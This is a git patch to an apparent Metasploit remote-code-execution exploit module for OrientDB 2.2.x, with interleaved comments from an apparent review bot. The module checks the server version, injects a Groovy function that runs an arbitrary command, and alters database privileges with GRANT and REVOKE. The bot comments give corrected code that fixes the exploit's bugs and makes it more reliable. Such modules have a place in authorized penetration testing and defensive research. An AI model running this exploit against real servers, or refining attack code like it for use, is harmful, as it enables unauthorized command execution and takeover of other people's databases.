From 30664924c8daa040e2e7b3f2aafca20c767b318f Mon Sep 17 00:00:00 2001
From: Ricardo Almeida
Date: Wed, 26 Jul 2017 13:59:14 +0100
Subject: [PATCH] Orientdb 2.2.x RCE - Reverted to send_request_raw due to issues exploiting windows boxes

---
 modules/exploits/multi/http/orientdb_exec.rb | 21 ++++++++------------
 1 file changed, 8 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb
index 62cb4263af..0a42b163e3 100644
--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def check
 uri = target_uri
 uri.path = normalize_uri(uri.path)
- res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
+ res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
 if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
 print_good("Version: #{res.headers['Server']}")
 return Exploit::CheckCode::Vulnerable
@@ -67,12 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
 request_parameters = {
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
- 'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
 'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
 }
- res = send_request_cgi(request_parameters)
+ res = send_request_raw(request_parameters)
 if not (res and res.code == 201)
 begin
 json_body = JSON.parse(res.body)
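Review bot: The version test on the `if` line of `check` has an alternation-precedence bug: `/OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/` matches "OrientDB Server v.2.2.[2-9]" OR any "1[0-9]" OR any "2[0-2]" anywhere in the Server header, and nothing forbids a following digit, so a header such as "v.2.1.10" or a patched "v.2.2.23" is still reported Vulnerable. Group the alternatives and reject a trailing digit: `res.headers['Server'] =~ /OrientDB Server v\.2\.2\.(?:[2-9]|1[0-9]|2[0-2])(?!\d)/`. While there, `&&` in place of `and` avoids Ruby's low-precedence trap in the same condition. The body of `check` (its non-vulnerable branch) continues outside the hunk.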
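Review bot: When the target does not answer, `res` is nil, the `if not (res and res.code == 201)` branch is entered, and `JSON.parse(res.body)` two lines later raises NoMethodError instead of reporting the failure; guard it first with `fail_with(Failure::Unreachable, 'No response from OrientDB server') unless res`. The `'data'` body is also a hand-built JSON string interpolating `func_name` and `java_craft_runtime_exec(cmd)`; unless that helper already JSON-escapes its output (not visible here), a `"` or `\` in the generated Groovy breaks the document, and building a hash and calling `.to_json` (JSON is already loaded for `JSON.parse`) removes the doubt. The enclosing method starts and ends outside the hunk.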
@@ -85,12 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote
 request_parameters = {
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
- 'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
 'data' => ""
 }
- req = send_request_cgi(request_parameters)
+ req = send_request_raw(request_parameters)
 if not (req and req.code == 200)
 begin
 json_body = JSON.parse(res.body)
@@ -113,12 +111,11 @@ class MetasploitModule < Msf::Exploit::Remote
 request_parameters = {
 'method' => 'DELETE',
 'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
- 'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*' },
 'data' => ""
 }
- rer = send_request_cgi(request_parameters)
+ rer = send_request_raw(request_parameters)
 if not (rer and rer.code == 204)
 begin
 json_body = JSON.parse(res.body)
@@ -159,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
 vprint_status("Attempting to execute: #{cmd}")
 @uri = target_uri
 @uri.path = normalize_uri(@uri.path)
- res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
+ res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
 if res && res.code == 200 && res.body.length > 0
 begin
 json_body = JSON.parse(res.body)["databases"]
@@ -199,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def exploit
 @uri = target_uri
 @uri.path = normalize_uri(@uri.path)
- res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
+ res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
 if res && res.code == 200 && res.body.length > 0
 begin
 json_body = JSON.parse(res.body)["databases"]
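Review bot: The failure branch after `if not (req and req.code == 200)` parses `res.body`, but the response for this request is `req`; `res` is whatever earlier response happens to be in scope (not visible in the hunk), so the error shown is for the wrong request, or a NameError if no `res` exists in this method. Change it to `json_body = JSON.parse(req.body)` and, because a nil `req` also takes this branch, guard it first with `fail_with(Failure::Unreachable, 'No response from OrientDB server') unless req`. The enclosing method starts and ends outside the hunk.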
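Review bot: The same copy-paste slip is in the DELETE hunk: after `if not (rer and rer.code == 204)` the code parses `res.body` rather than `rer.body`, so the error path never inspects the response it is handling. Use `json_body = JSON.parse(rer.body)` and add `fail_with(Failure::Unreachable, 'No response from OrientDB server') unless rer` ahead of it, since a connection failure yields a nil `rer` that would otherwise raise NoMethodError inside this branch. The enclosing method starts and ends outside the hunk.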
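Review bot: `"#{@uri.path}listDatabases"` on the `+` line of `exploit` concatenates without a separator, and `normalize_uri` as called on the preceding line does not append a trailing slash, so unless TARGETURI is constrained elsewhere to end in `/` (not visible here) a base path such as `/orientdb` becomes `/orientdblistDatabases`. Let the helper do the join: `res = send_request_raw({'uri' => normalize_uri(@uri.path, 'listDatabases')})`. The same construction appears in `check` and in the hunk just above. `exploit` continues outside the hunk.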
@@ -221,12 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
 'vars_get' => { 'format' => 'rid,type,version,class,graph' },
- 'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*' },
 'data' => "GRANT #{priv} ON #{item} TO writer"
 }
- res = send_request_cgi(request_parameters)
+ res = send_request_raw(request_parameters)
 end
 end
 # Exploit
@@ -249,12 +245,11 @@ class MetasploitModule < Msf::Exploit::Remote
 'method' => 'POST',
 'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
 'vars_get' => { 'format' => 'rid,type,version,class,graph' },
- 'encode_params' => false,
 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
 'headers' => { 'Accept' => '*/*' },
 'data' => "REVOKE #{priv} ON #{item} FROM writer"
 }
- res = send_request_cgi(request_parameters)
+ res = send_request_raw(request_parameters)
 end
 end
 end
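Review bot: Switching the GRANT request to `send_request_raw` silently disables the `'vars_get' => { 'format' => 'rid,type,version,class,graph' },` entry: as far as I recall, Rex's `request_raw` reads `'uri'`, `'query'`, `'headers'`, `'data'` and `'authorization'` but never `'vars_get'` (only `request_cgi` expands that key), so the command is now sent without its `?format=` query string. If the endpoint needs it, carry it as `'query' => 'format=rid,type,version,class,graph',` in place of the `vars_get` line; if it does not, drop the line so it stops suggesting it is in effect. The `request_parameters` hash opens before the hunk.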
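Review bot: The REVOKE request has the same problem as the GRANT one above it: with `send_request_raw` the `'vars_get'` hash is, to my recollection, never consulted, so the `format` parameter no longer reaches `/command/#{targetdb}/sql/-/20`. Either replace that entry with `'query' => 'format=rid,type,version,class,graph',` or remove it, and keep both requests consistent with whichever choice is made. The `request_parameters` hash and the method enclosing it begin before the hunk.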